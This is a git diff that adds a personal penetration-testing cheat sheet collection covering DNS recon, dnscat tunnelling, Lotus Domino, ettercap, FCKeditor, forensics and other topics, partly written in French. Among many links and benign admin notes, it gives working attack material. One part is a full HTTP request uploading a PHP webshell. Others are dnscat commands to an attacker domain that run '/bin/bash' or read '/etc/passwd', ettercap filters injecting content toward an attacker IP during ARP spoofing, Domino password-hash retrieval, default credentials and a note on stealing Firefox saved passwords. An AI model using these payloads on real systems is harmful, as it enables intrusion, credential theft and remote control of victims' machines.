+c:\&gt; psloglist.exe \\dc1.corp.com -accepteula -u aaxadm -p Password123 -s -i 4624,4768,4769 security &gt; %TEMP%\extract.csv
+```
+The event IDs 4624, 4768 and 4769 are relevent to logons, but maybe more IDs could be added to the list.
+
+Use the [digvip.py](https://github.com/lanjelot/pentest-tricks/digvip.py) script to then parse the extract and dig up the "John Cissp" account:
+```
+$ digvip.py /tmp/extract.csv jcissp
+[+] Parsing /tmp/extract.csv, looking for jcissp
+            Logon time       Client IP Domain\account
+  9/13/2013 6:39:07 AM  192.168.100.66 FRD\jcissp
+  9/13/2013 6:36:53 AM  192.168.100.66 FRD.CORP.COM\jcissp@frd.corp.com
+  9/13/2013 6:16:46 AM  192.168.100.66 FRD.CORP.COM\jcissp
+```
diff --git a/Cheat Sheet/disable_bluetooth b/Cheat Sheet/disable_bluetooth
new file mode 100644
index 0000000..46dc42b
--- /dev/null
+++ b/Cheat Sheet/disable_bluetooth	
@@ -0,0 +1,8 @@
+# disable bluetooth
+
+blacklist bluetooth
+blacklist btusb
+
+set BLUETOOTH_ENABLED to zero in /etc/default/bluetooth
+
+echo disabled > /proc/acpi/ibm/bluetooth
diff --git a/Cheat Sheet/dmcrypt_luks b/Cheat Sheet/dmcrypt_luks
new file mode 100644
index 0000000..53a0d83
--- /dev/null
+++ b/Cheat Sheet/dmcrypt_luks	
@@ -0,0 +1,17 @@
+# dmcrypt_luks
+
+dd if=/dev/urandom of=/path/to/file bs=10M count=2000
+losetup /dev/loop0 /path/to/file
+cryptsetup -c aes --key-size 256 luksFormat /dev/loop0
+
+cryptsetup luksOpen /dev/loop0 blah
+dmsetup ls
+ls -l /dev/mapper
+
+mke2fs -m0 /dev/mapper/blah
+mkdir /mnt/blah
+mount /dev/mapper/blah /mnt/blah
+
+umount /mnt/blah
+cryptsetup luksClose blah
+losetup -d /dev/loop0
diff --git a/Cheat Sheet/dns b/Cheat Sheet/dns
new file mode 100644
index 0000000..f972d8b
--- /dev/null
+++ b/Cheat Sheet/dns	
@@ -0,0 +1,78 @@
+# dns / recon
+
+# free dns
+freedns.afraid.org/subdomain/
+duckdns.org
+
+# dnssec nsec/nsec3 walk
+https://github.com/anonion0/nsec3map
+etc.
+
+# axfr
+dig @ns12.zoneedit.com zonetransfer.me axfr
+host -l -a blah.com. ns1.blah.com
+nslookup ; server ns12.zoneedit.com; ls -d zonetransfer.me
+
+# obtain hostname and version
+dig @ns1.blah.com hostname.bind ch txt
+dig @ns1.blah.com version.bind ch txt
+
+# recursif?
+dig @client_dns_srv www.blah.fr A
+Regarder aussi le TTL qui peut indiquer que 2 IP sont en fait le meme DNS
+if recusive, cache poisoning, tunneling
+DoS: if dns srv allows these recursive queries via UDP, then the host can be used to 'bounce' Denial of Service attacks against another network or system
+Restrict recursive queries to the hosts that should use this nameserver (such as those of the LAN connected to it).
+bind8: 'allow-recursion' in the 'options' section of your named.conf
+bind9: define a grouping of internal addresses using the 'acl' command
+Then, within the options block, you can explicitly state: 'allow-recursion { hosts_defined_in_acl }
+
+# tester kaminsky attack
+dig @217.109.14.165 +short porttest.dns-oarc.net TXT
+
+# dns poisoning
+http://shinobi.dempsky.org/~matthew/dnstrust/example.html
+
+# mdns poisoning
+http://www.gnucitizen.org/blog/name-mdns-poisoning-attacks-inside-the-lan/
+
+# hostmap a la mano
+http://dnstrails.com/
+http://www.bfk.de/bfk_dnslogger.html?query=$IP
+http://www.gigablast.com/search?n=100&q=ip:$IP
+http://www.bing.com/search?q=ip:$IP
+http://api.search.live.net/xml.aspx?Appid=$API_KEY&query=ip:$IP&sources=web&web.count=50&web.offset=$OFFSET //see hostmap
+http://dnshistory.org/browsedomains/$DOMAIN
+http://pgp.mit.edu:11371/pks/lookup?op=index&search=$DOMAIN
+http://searchdns.netcraft.com/?restriction=site+ends+with&host=$DOMAIN
+http://www.robtex.com/ip/$IP.html
+http://www.tomdns.net/get_hostonip.php?target=$IP
+http://tools.web-max.ca/websitesonip.php POST: ip=$IP byip=Search+by+specific+IP
+http://www.dnsdigger.com/
+http://domainsdb.net/
+
+# recon
+http://infond.blogspot.com/2010/05/tutoriel-footprinting-recherche-passive.html
+
+dnstrails.com
+dnshistory.org
+www.domainsdb.net
+www.gigablast.com
+searchdns.netcraft.com
+www.robtex.com
+www.tomdns.net
+www.web-max.ca
+
+admins/whois
+subdomainer --> googlit
+metagoofil
+shodanhq.com !!
+robots.txt sitemap.xml
+maltego
+hostmap
+fierce
+moar tools in README of dnsmap (knock, reverseraider, fierce, ...)
+
+# tld enumeration
+dnsrecon.rb
+dnsmap
diff --git a/Cheat Sheet/dns2tcp b/Cheat Sheet/dns2tcp
new file mode 100644
index 0000000..743db5c
--- /dev/null
+++ b/Cheat Sheet/dns2tcp	
@@ -0,0 +1,4 @@
+# dns2tcp
+
+# setup howto
+http://www.h-i-r.net/2010/03/dns-tunneling-part-3-linux-mac-os-x-and.html
diff --git a/Cheat Sheet/dnscat b/Cheat Sheet/dnscat
new file mode 100644
index 0000000..ea3af08
--- /dev/null
+++ b/Cheat Sheet/dnscat	
@@ -0,0 +1,20 @@
+# dnscat
+
+# dnscat2
+attacker:
+sudo -s
+export GEM_HOME=/home/blah/.gem/ruby/2.0.0
+ruby dnscat2_server.rb -o d2t.attacker.com
+
+victim:
+./dnscat d2t.attacker.com -e id # -e 'cat /etc/passwd' etc. # if crashes half the time, restart server
+
+./dnscat d2t.attacker.com -l 9999
+nc -vn 127.0.0.1 9999 -e /bin/bash
+
+./dnscat d2t.attacker.com --socks4 3333
+curl --socks4 127.0.0.1:3333 http://127.0.0.1/exploit.c
+
+./dnscat d2t.attacker.com --tunnel 1.2.3.4:1234 -l 9999
+nc -vn 127.0.0.1 9999
+victim -> attacher -> 1.2.3.4:1234
diff --git a/Cheat Sheet/domino b/Cheat Sheet/domino
new file mode 100644
index 0000000..f7657c6
--- /dev/null
+++ b/Cheat Sheet/domino	
@@ -0,0 +1,170 @@
+# IBM lotus / domino server
+
+# local on Lotus Notes 8.5 or 9 (normal user to SYSTEM)
+http://reniknet.blogspot.fr/2015/01/la-cas-de-la-backdoor-incluse-dans.html
+nsd.exe -monitor
+nsd> LOAD CMD
+
+# pentest
+http://blog.nibblesec.org/2013/08/all-your-inotes-emails-are-belong-to-me.html
+http://blog.quarkslab.com/have-you-ever-played-with-domino.html
+http://www.intelligentexploit.com/articles/Hackproofing-Lotus-Domino-Web-Server.pdf
+http://seclists.org/pen-test/2008/May/64
+http://carnal0wnage.attackresearch.com/2012/08/lotus-domino-scanner.html
+http://www.sectechno.com/hacking-lotus-domino/
+http://www.securityfocus.com/archive/75/474476
+
+# admin console
+the admin console is /webadmin.nsf
+but only admins can login (if not admin but valid l/p -> 401 Unauthorized)
+so it's best to bruteforce names.nsf
+the login is case insensitive
+run os commands using the Live Console
+
+# hashes
+GET /names.nsf/$defaultview?Readviewentries
+GET /names.nsf/$defaultview/<unid e.g: 3EF1AE103E3DC17E88257CF300656249>?OpenDocument
+
+# if /names.nsf returns 500 Internal Server Error, try:
+names.nsf?Login
+
+http://seclists.org/pen-test/2007/Jul/161
+
+# fp with help/
+https://www.hpf.com.au/help/help85_admin.nsf
+https://www.hpf.com.au/help/help9_admin.nsf
+
+# tools
+http://www.exploit-db.com/exploits/3302/
+lotophagi
+https://www.exploit-db.com/exploits/39495/ (python)
+
+# user enum
+nmap -p1352 -sV --script domino-enum-users --script-args userdb=/path/to/logins.txt,domino-enum-users.path=/tmp/blah 1.2.3.4
+cat screenlog.0 | grep -E 'User ".*" found|Successfully' | grep -Eo '".*"' | tr -d '"' | sort -u
+
+# gul
+/names.nsf    => Domino Directory, contains all usernames and password hashes
+/dom.nsf      => "Web Server Configuration" might be usefull
+/domcfg.nsf   => ... SAME ...
+/log.nsf      => Notes Log
+/webadmin.nsf => domino admin page
+
+File extensions
+.nsf => Notes databases
+.box => Notes mail boxes
+.ntf => Notes databases templates
+
+Interesting paths
+lotus\domino\data             => Domino Database install path (.nsf & .ntf)
+lotus\domino\data\domino\html => Non-database data such as HTML files
+
+Database interactions:
+Actions are performed using query strings OR through ! delimiter
+ - http://server/statrep.nsf?OpenDatabase
+ - http://server/statrep.nsf!OpenDatabase
+
+Some useful commands:
+OpenServer
+OpenNavigator
+ReadEntries
+OpenView
+ReadViewEntries
+OpenDocument
+EditDocument
+CreateDocument
+DeleteDocument
+SaveDocument
+ReadDesign
+OpenForm
+ReadForm
+OpenAgent
+SearchView
+OpenIcon
+OpenAbout
+OpenHelp
+
+Usefull server commands
+   Command      |                Example      |     Description
+----------------+-----------------------------+------------------------------------------
+OpenServer      | http://server/?OpenServer   | List the databases on a Domino Server
+
+
+Useful database commands
+   Command      |                Example                              |     Description
+----------------+-----------------------------------------------------+------------------------------------------
+OpenNavigator   |                                                     | Navigate in the databases
+                | http://server/statrep.nsf/$defaultNav?OpenNavigator | List visible Views in the database
+                | http://server/statrep.nsf/home?OpenNavigator        | Navigate the home data
+                | http://server/8000000000000000/$defaultNav          | Default navigator using the database ReplicaID
+ReadEntries     | http://server/statrep.nsf?ReadEntries               | XML listing of visible views.
+                                                                      | Contains Views'  (UNID) and the views' name.
+                |                                                     | Useful if access to the default navigator is prohibited.
+
+Usefull view commands
+   Command      |                Example                         |     Description
+----------------+------------------------------------------------+------------------------------------------
+OpenView        | http://server/statrep.nsf/view?OpenView        | Not much to say here
+ReadViewEntries | http://server/statrep.nsf/view?ReadViewEntries | XML listing  of documents within a view
+ReadDesign      | http://server/statrep.nsf/view?ReadDesign      | XML listing describing the structure of the view.
+
+Usefull document commands
+   Command     |                Example                             |     Description
+---------------+----------------------------------------------------+------------------------------------------
+OpenDocument   | http://server/statrep.nsf/view/doc?OpenDocument    | Opens a document in read mode
+EditDocument   | http://server/statrep.nsf/view/doc?EditDocument    | Opens a document in write mode
+               |                                                    | If the form only allows a field
+	       |                                                    | just change the form parameters / request
+SaveDocument   | http://server/statrep.nsf/view/doc?SaveDocument    | Called by EditDocument when modifying the doc
+DeleteDocument | http://server/statrep.nsf/view/doc?DeleteDocument  | Delete documents
+CreateDocument | http://server/statrep.nsf/view/form?CreateDocument | Create a document in the database
+
+
+Useful database objects
+  Object     |                Example                              |     Description
+-------------+-----------------------------------------------------+------------------------------------------
+$defaultNav  | http://server/statrep.nsf/$defaultNav?OpenNavigator | The default navigator
+$icon        | http://server/statrep.nsf/$icon?OpenIcon            | Icon for the database
+$icon        | http://server/statrep.nsf/$icon                     | Icon for the database
+$help        | http://server/statrep.nsf/$help?OpenHelp            | Describes how to use the database
+$about       | http://server/statrep.nsf/$about?OpenAbout          | Page that tells you "about" the database
+$first       | http://server/statrep.nsf/view/$first?OpenDocument  | Opens the first document in a given view
+$defaultform | http://server/statrep.nsf/$defaultform?OpenForm     | The first form found in the database.
+
+Database Structure Enumeration
+* Enumerating Views,Forms, Agents and Special Database Objects
+
+Universal Note IDs (UNIDs): 32 character long strings.
+NoteID: Smaller ID => For any view, hidden or visible, form or agent, NoteID start ~0x11A then by 4 increment
+        Seems that NoteID are not available for databases
+
+Examples:
+ - UNID   => http://server/statrep.nsf/0a89ad68dd8b0187852561780077caf0/b937c60966dbb9dd80256a7400059cc6
+ - NoteID => http://server/statrep.nsf/11A
+
+* Enumerating Documents
+
+NoteID => For ducoments, starts at 0x8F6 then by 4 increment
+          error 500: all documents have been enumerated
+          error 404: document was deleted
+
+To get the NoteID of a document open a view with theReadViewEntries command.
+
+ - http://10.0.0.11/statrep.nsf/3.+Events/?ReadViewEntries
+
+To list all documents
+ - http://server/statrep.nsf/$Alarms/8F6 and upward by 4
+
+* Using the ReplicaID
+ReplicaID is used when databases are on multiple servers, to track modifications
+
+ReplicaID of names.nsf is 80256A7100183ABF
+ names.nsf can be called as follow:
+ - http://server/80256A7100183ABF/
+ - http://server/__80256A7100183ABF.nsf/
+ - http://server/__80256A7100183ABF.ns4/
+ - http://server/__80256A7100183ABF.box/
+
+* If filtered
+Just url encode never knows, it bypass notes recommendations
+
diff --git a/Cheat Sheet/dos b/Cheat Sheet/dos
new file mode 100644
index 0000000..3230e93
--- /dev/null
+++ b/Cheat Sheet/dos	
@@ -0,0 +1,9 @@
+# dos
+
+# ddos
+Ddossim
+Mausezahn
+Tcpreplay
+
+# dos tcp
+LetDown http://complemento.sourceforge.net/ (based on Fyodor NDos)
diff --git a/Cheat Sheet/dpapi b/Cheat Sheet/dpapi
new file mode 100644
index 0000000..b9629af
--- /dev/null
+++ b/Cheat Sheet/dpapi	
@@ -0,0 +1,5 @@
+# dpapi
+
+# dpapi secrets
+password wifi
+http://blog.digital-forensics.it/2015/01/happy-dpapi.html
diff --git a/Cheat Sheet/drupal b/Cheat Sheet/drupal
new file mode 100644
index 0000000..5d2c0a9
--- /dev/null
+++ b/Cheat Sheet/drupal	
@@ -0,0 +1,11 @@
+# drupal
+
+# unserialize() in the Drupal 7.x Services module
+https://www.ambionics.io/blog/drupal-services-module-rce
+
+# install module to get a shell
+https://www.drupal.org/project/shell
+
+# sqli in prepared statements
+https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
+https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html
diff --git a/Cheat Sheet/eDirectory b/Cheat Sheet/eDirectory
new file mode 100644
index 0000000..6593d94
--- /dev/null
+++ b/Cheat Sheet/eDirectory	
@@ -0,0 +1,6 @@
+# eDirectory sASLoginConfiguration
+http://ldapwiki.willeke.com/wiki/Universal%20Password
+http://ldapwiki.willeke.com/wiki/NovellS%20Challenge%20Response%20System
+
+# admin HTTP interface
+admin.o=asdf / password # ssl cert may disclose context
diff --git a/Cheat Sheet/emerge b/Cheat Sheet/emerge
new file mode 100644
index 0000000..fa24e3e
--- /dev/null
+++ b/Cheat Sheet/emerge	
@@ -0,0 +1,3 @@
+# emerge
+
+qlist -IC | xargs qlop -CtH | grep minute | sort -rn -t' ' -k 2
diff --git a/Cheat Sheet/eprise b/Cheat Sheet/eprise
new file mode 100644
index 0000000..8b33558
--- /dev/null
+++ b/Cheat Sheet/eprise	
@@ -0,0 +1,6 @@
+# SilkRoad eprise
+
+https://website/eprise/sysinfo?loglevel=2
+
+# some admin doc i found with google i feel lucky
+http://cms.comsoc.org/eprsup/Doc/AdminGuide.pdf
diff --git a/Cheat Sheet/ettercap b/Cheat Sheet/ettercap
new file mode 100644
index 0000000..b40b89b
--- /dev/null
+++ b/Cheat Sheet/ettercap	
@@ -0,0 +1,51 @@
+# ettercap
+
+# filter
+* old
+pb avec reponse en plusieurs paquets:
+    if (search(DATA.data, "Server: gws")) {
+        replace("/intl/fr/privacy.html", "/intl/fr/pr1v4cy.html");
+ne remplace pas parce que "/intl/fr/privacy.html" est pas dans le meme paquet que l'entete
+
+* injecting UNC path
+cat > blah.ecf <<'EOF'
+if (ip.proto == TCP && tcp.dst == 80) {
+  if (search(DATA.data, "Accept-Encoding")) {
+    replace("Accept-Encoding", "Accept-Nothingg");
+  }
+}
+
+if (ip.proto == TCP && tcp.src == 80) {
+  if (search(DATA.data, "</body>")) {
+    msg("body detected");
+pcre_regex(DATA.data, "(?s).{79}</body>", "<!-- --><img src="http://192.168.2.6//b//l.jpg" alt="" style="width:0px; height:0px"></body>");
+or
+pcre_regex(DATA.data, "(?s).{76}<body>", "<body><img src="http://192.168.2.6//b//l.jpg" alt="" style="width:0px; height:0px">");
+
+    msg("body injected");
+  }
+}
+EOF
+etterfilter blah.ecf -o blah.ef
+
+* troubleshooting
+etterfilter -t blah.ef
+
+* difficile de maj le Content-Length
+du coup, on peut pas faire replace() avec une chaine plus longue que celle qu'on remplace
+
+# run
+ettercap -i wlan0 -Tq -M arp:remote -F filter.ef /192.168.2.254// /192.168.2.7//
+
+# google + java_signed_applet
+ettercap -M arp:remote -Tq -F etter_iframe.ef /192.168.1.26/ /192.168.1.1/
+if (ip.proto == TCP && tcp.dst == 80) {
+    if (search(DATA.data, "Host: www.google.fr")) {
+        replace("Accept-Encoding", "Accept-Nothingg");
+    }
+}
+
+if (ip.proto == TCP && tcp.src == 80) {
+    replace("", "<iframe src="http://192.168.1.20:8080/j" ..
+}
+
diff --git a/Cheat Sheet/evasion b/Cheat Sheet/evasion
new file mode 100644
index 0000000..5f2620c
--- /dev/null
+++ b/Cheat Sheet/evasion	
@@ -0,0 +1,8 @@
+# evasion
+
+http://noxxi.de/research/http-evader.html
+
+./fragroute/PKGBUILD:pkgdesc="A network intrusion detection evasion toolkit"
+./inundator/PKGBUILD:pkgdesc="An ids evasion tool, used to anonymously inundate intrusion detection logs with false positives in order to obfuscate a real attack."
+
+http://pauldotcom.com/2009/08/tcp-frament-evasion-attacks.html
diff --git a/Cheat Sheet/exchange b/Cheat Sheet/exchange
new file mode 100644
index 0000000..f3c1de6
--- /dev/null
+++ b/Cheat Sheet/exchange	
@@ -0,0 +1,6 @@
+# microsoft exchange
+
+https://testconnectivity.microsoft.com/
+
+# owa version numbers
+http://eightwone.com/references/versions-builds-dates/
diff --git a/Cheat Sheet/exif b/Cheat Sheet/exif
new file mode 100644
index 0000000..ce99e8f
--- /dev/null
+++ b/Cheat Sheet/exif	
@@ -0,0 +1,3 @@
+# exif
+
+http://regex.info/exif.cgi
diff --git a/Cheat Sheet/expect b/Cheat Sheet/expect
new file mode 100644
index 0000000..770f59a
--- /dev/null
+++ b/Cheat Sheet/expect	
@@ -0,0 +1,10 @@
+# expect
+
+$ cat blah
+#!/usr/bin/expect -f
+
+set timeout 3
+spawn ssh admin@192.168.1.1
+expect "password: $"
+send "admin\r"
+interact
diff --git a/Cheat Sheet/exploitation b/Cheat Sheet/exploitation
new file mode 100644
index 0000000..cb8b55a
--- /dev/null
+++ b/Cheat Sheet/exploitation	
@@ -0,0 +1,72 @@
+# exploitation
+
+# gcc -m32
+* signed int (4 bytes)
+0x80000000  -> 0xffffffff -> 0x7fffffff
+-2147483648 -> -1 -> 2147483647
+
+array max index is 0x7fffffff then it wraps to 0, e.g: blah[0x80000001] == blah[1]
+
+# tutorials
+https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
+...
+https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/
+http://www.win.tue.nl/~aeb/linux/hh/hh-10.html
+https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w/videos
+
+# linux kernel
+https://sploitfun.wordpress.com/2015/06/26/linux-x86-exploit-development-tutorial-series/
+
+# rop on x64
+https://blog.skullsecurity.org/2015/defcon-quals-r0pbaby-simple-64-bit-rop
+https://github.com/jeffball55/rop_compiler
+
+# rop 101
+http://beta.hackndo.com/return-oriented-programming/
+http://seclists.org/fulldisclosure/2015/Jun/76
+
+# syscalls
+https://github.com/Hackndo/misc/blob/master/syscalls32.md
+https://github.com/Hackndo/misc/blob/master/syscalls64.md
+
+# browser exploitation
+https://github.com/demi6od/Smashing_The_Browser
+
+# Writing Kernel Exploits
+http://ugcs.net/~keegan/talks/kernel-exploit/talk.pdf
+https://github.com/hacksysteam/HackSysExtremeVulnerableDriver
+https://osandamalith.com/2017/04/05/windows-kernel-exploitation-stack-overflow/
+
+# heap visualization
+https://github.com/wapiflapi/villoc
+
+# heap exploitation tuto
+https://github.com/shellphish/how2heap
+
+# framework
+https://github.com/zcutlip/bowcaster.git
+
+# shellcode
+https://github.com/reyammer/shellnoob
+
+# pe
+http://hshrzd.wordpress.com/pe-bear/
+
+# bin visualization
+https://github.com/google/binnavi
+
+# windows internals
+http://web.archive.org/web/20110715155147/http://sveta.rawol.com/?topic=2
+
+# datasheet (specs techniques)
+http://www.datasheetlib.com/
+
+# rop
+http://www.ropgenius.com/
+
+# format string
+https://github.com/hellman/libformatstr
+http://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html
+https://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf (some bits are outdated such as: The GNU C library contains a bug, that results in a crash if you use parameters like ‘%nd’ with n greater than 1000. This is one way to determine the existance of the GNU C library remotely"
+fmt string challenge: https://w3challs.com/challenges/challenge67
+https://blog.skullsecurity.org/2015/defcon-quals-babyecho-format-string-vulns-in-gory-detail (jrm)
diff --git a/Cheat Sheet/exploits b/Cheat Sheet/exploits
new file mode 100644
index 0000000..f2bbcd2
--- /dev/null
+++ b/Cheat Sheet/exploits	
@@ -0,0 +1,16 @@
+# exploits
+
+https://github.com/rfunix/Pompem
+
+# exploitdbs
+http://farlight.org
+http://www.exploit-db.com/archive.tar.bz2
+http://dl.packetstormsecurity.net/1301-exploits/1301-exploits.tgz
+http://www.intelligentexploit.com/
+http://www.farlight.org/ # "mirror of exploit-db with perf and nice features" --kcope
+
+# buffer overflows bof
+http://insecure.org/stf/mudge_buffer_overflow_tutorial.html
+https://code.google.com/p/it-sec-catalog/wiki/Exploitation
+
+./bed/PKGBUILD:pkgdesc="Collection of scripts to test for buffer overflows, format string vulnerabilities."
diff --git a/Cheat Sheet/ezpublish b/Cheat Sheet/ezpublish
new file mode 100644
index 0000000..43634fd
--- /dev/null
+++ b/Cheat Sheet/ezpublish	
@@ -0,0 +1,12 @@
+# ezpublish
+
+# default admin creds
+admin / publish
+https://doc.ez.no/eZ-Publish/User-manual/4.x/The-administration-interface/The-login-page
+
+# vulns
+* sqli CVE-2010-2672
+3.7.0 through 4.2.0 allow remote attackers to execute arbitrary SQL commands via the (1) SectionID and (2) SearchTimestamp parameters to the search feature and the (3) SearchContentClassAttributeID parameter to the advancedsearch feature. 
+
+* unspecified and unknown impact lol CVE-2012-1565
+Unspecified vulnerability in ez Publish 4.1.4, 4.2, 4.3, 4.4, 4.5, and 4.6 has unknown impact and attack vectors related to an insecure direct object reference. 
diff --git a/Cheat Sheet/fckeditor b/Cheat Sheet/fckeditor
new file mode 100644
index 0000000..3235cb9
--- /dev/null
+++ b/Cheat Sheet/fckeditor	
@@ -0,0 +1,21 @@
+# fckeditor
+
+# no extension verification when Type=Media
+POST /Admin/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media HTTP/1.1
+Host: www.foo.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:29.0) Gecko/20100101 Firefox/29.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://www.foo.com/Admin/fckeditor/editor/filemanager/upload/php/
+Cookie: PHPSESSID=m3pjuop2vmd6u9tblj70a346v0
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=--------692044082
+Content-Length: 151
+
+----------692044082
+Content-Disposition: form-data; name="NewFile"; filename="webshell.php"
+
+<?php eval($_REQUEST["c"]);
+
+----------692044082--
diff --git a/Cheat Sheet/ffmpeg b/Cheat Sheet/ffmpeg
new file mode 100644
index 0000000..e9efa54
--- /dev/null
+++ b/Cheat Sheet/ffmpeg	
@@ -0,0 +1,4 @@
+# ffmpeg
+
+ffmpeg -i 01.mpc -acodec libvorbis -y -ab 192k 01.ogg
+
diff --git a/Cheat Sheet/finger b/Cheat Sheet/finger
new file mode 100644
index 0000000..4a353ea
--- /dev/null
+++ b/Cheat Sheet/finger	
@@ -0,0 +1,5 @@
+# finger
+
+# Finger Recursive Request Arbitrary Site Redirection
+finger -l root@6.6.6.6@1.2.3.4
+
diff --git a/Cheat Sheet/firebird b/Cheat Sheet/firebird
new file mode 100644
index 0000000..cf162d7
--- /dev/null
+++ b/Cheat Sheet/firebird	
@@ -0,0 +1,5 @@
+# firebird
+
+# default creds
+User     : SYSDBA
+Password : masterkey
diff --git a/Cheat Sheet/firefox b/Cheat Sheet/firefox
new file mode 100644
index 0000000..13bf3f7
--- /dev/null
+++ b/Cheat Sheet/firefox	
@@ -0,0 +1,9 @@
+# firefox
+
+# to have a nicer save dialog
+ui.allow_platform_file_picker -> false
+
+# pour voler les mots de passe sauvegardés sans master password,
+# copier ces 2 fichiers dans ma VM
+key3.db
+signons.sqlite
diff --git a/Cheat Sheet/firewall b/Cheat Sheet/firewall
new file mode 100644
index 0000000..1a76b7c
--- /dev/null
+++ b/Cheat Sheet/firewall	
@@ -0,0 +1,22 @@
+# firewall
+
+NetAsq
+SonicWall
+NetScreen (Juniper)
+Fortigate (Fortinet)
+Cisco PIX
+CheckPoint
+
+# backdoors
+Juniper ScreenOS
+Fortigate: http://seclists.org/fulldisclosure/2016/Jan/26 someone said it worked on FortiWifi60C FortiOS 4.0 and 5.0
+
+# fortigate (de fortinet)
+possible de definir des interfaces
+logs envoyés over le reseau vers un fortianalyser
+
+# checkpoint
+tout est defini globalement (plus lisible)
+
+# analysis
+https://github.com/averagesecurityguy/prometheus
diff --git a/Cheat Sheet/flash b/Cheat Sheet/flash
new file mode 100644
index 0000000..076b0bc
--- /dev/null
+++ b/Cheat Sheet/flash	
@@ -0,0 +1,20 @@
+# amf - flex - flash - swf
+
+# decode amf
+pyamf http://blog.dornea.nu/2015/06/22/decode-adobe-flex-amf-protocol/
+
+# action script
+http://blog.mindedsecurity.com/2015/03/exploiting-cve-2011-2461-on-googlecom.html
+
+# method enumeration and interrogation against flash remoting end points
+https://github.com/SpiderLabs/deblaze
+
+# guide
+http://www.ivizsecurity.com/blog/web-application-security/testing-flash-applications-pen-tester-guide/
+http://blog.gdssecurity.com/labs/2009/11/11/pentesting-adobe-flex-applications-with-a-custom-amf-client.html (pyamf good tutorial)
+http://code.google.com/p/blogfranz/wiki/FlashStuff
+
+# decompilers
+http://bruce-lab.blogspot.co.il/2010/08/freeswfdecompilers.html
+flasm
+Sothink (windows) the best to have a clean decompiler code and a nice UI to search for things
diff --git a/Cheat Sheet/forensic b/Cheat Sheet/forensic
new file mode 100644
index 0000000..0253f5b
--- /dev/null
+++ b/Cheat Sheet/forensic	
@@ -0,0 +1,97 @@
+# forensic
+
+http://www.forensicswiki.org/
+http://computer-forensics.sans.org/blog/2012/04/25/cheat-sheet
+
+# recover deleted files from an ext[34] partition
+undelete (/usr/share/doc/extundelete/README)
+
+# log2timeline + plaso
+http://blog.kiddaland.net/downloads/
+
+# linux mem dump with rekall
+https://isc.sans.edu/diary/Linux+Memory+Dump+with+Rekall/17775
+
+# recover passwords from swap (unix accounts' etc.)
+https://github.com/sevagas/swap_digger
+https://github.com/huntergregal/mimipenguin
+
+# differences between two virtual machine disk images
+http://libguestfs.org/virt-diff.1.html (via http://rwmj.wordpress.com/2013/12/19/new-in-virt-tools-virt-diff)
+
+# fuzzy tree diff
+https://github.com/bmaia/binwally
+
+# hashes db of known good/bad files
+NIST
+http://bin-test.shadowserver.org/
+
+# mactimes
+Unix ou NTFS, ctime: last time inode/MFT modified
+FAT, ctime: time file was created
+
+# checklist
+http://isc.sans.edu/diary.html?storyid=10339 voir les listes à la fin
+http://isc.sans.edu/diary.html?storyid=9325
+http://www.mandiant.com/services/emergency_incident_response/
+
+# volatility
+http://www.forensicswiki.org/wiki/List_of_Volatility_Plugins
+https://github.com/volatilityfoundation/volatility/wiki/Command%20Reference
+http://forensiczone.blogspot.com/2009/01/using-volatility-1.html (recuperer des passwords depuis une image en RAM)
+
+# dd.exe
+http://gmgsystemsinc.com/fau/
+
+# blackarch
+./vinetto/PKGBUILD:pkgdesc="A forensics tool to examine Thumbs.db files"
+./rifiuti/PKGBUILD:pkgdesc="Examine the contents of the INFO2 file from a MS Recycle Bin file (forensic purposes)."
+./galleta/PKGBUILD:pkgdesc="Examine the contents of the IE's cookie files for forensic purposes"
+./pasco/PKGBUILD:pkgdesc="Examines the contents of Internet Explorer's cache files for forensic purposes"
+
+# Thumb.db
+https://thumbsviewer.github.io/
+vinetto -s
+
+# file carvers
+sorter
+foremost
+photorec
+binwalk
+scalpel
+
+# hidden protected are
+HPA: host protected area
+DCO: device configuration overlay
+
+# windows
+# http://www.youtube.com/watch?v=SVqiDdVS7Wo // DerbyCon 2013 Windows 0wn3d By Default Mark Baggett
+* reserved filenames
+copy putty.exe AUX
+can't delete unless using: del \\?\c:\TEMP\AUX
+
+alternate data streams invisible to dir /r with \\?\c:\temp\LPT1:ads.txt
+unless using: dir /r \\?\c:\temp
+
+* space directory
+mkdir \\?\c:\temp\".. \"
+dir /x
+
+# lsb (detecter les bits de poids faibles)
+http://hack-and-fun.blogspot.fr/2011/02/detection-de-lsb.html
+https://tc.giboulees.net/blah/tools/lsb
+
+# parse .DS_Store
+http://ds-store.readthedocs.org/en/latest/
+
+# network capture tools
+https://github.com/caesar0301/awesome-pcaptools
+
+* network visualizers
+http://www.xplico.org/
+http://www.netresec.com/?page=NetworkMiner
+
+* pcap parsers
+dpkt
+Impacket
+scapy
diff --git a/Cheat Sheet/fuzz b/Cheat Sheet/fuzz
new file mode 100644
index 0000000..944f6f3
--- /dev/null
+++ b/Cheat Sheet/fuzz	
@@ -0,0 +1,21 @@
+# fuzzing
+
+# forks de sulley
+https://github.com/jtpereyda/boofuzz
+https://github.com/cisco-sas/kitty
+
+# radamsa
+https://code.google.com/p/ouspg/
+
+# zulu
+https://github.com/nccgroup/Zulu
+
+# vfork in python
+https://labs.mwrinfosecurity.com/blog/2014/12/10/faster-fuzzing-with-python/
+
+# pentoo-portage-trunk
+app-fuzz
+
+# blackarch
+hexinject
+tcpjunk
diff --git a/Cheat Sheet/gcc b/Cheat Sheet/gcc
new file mode 100644
index 0000000..675227a
--- /dev/null
+++ b/Cheat Sheet/gcc	
@@ -0,0 +1,4 @@
+# gcc
+
+# compiler en statique
+gcc -Bstatic
diff --git a/Cheat Sheet/gdb b/Cheat Sheet/gdb
new file mode 100644
index 0000000..a25d76f
--- /dev/null
+++ b/Cheat Sheet/gdb	
@@ -0,0 +1,19 @@
+# gdb
+
+# better ui
+https://github.com/snarez/voltron
+
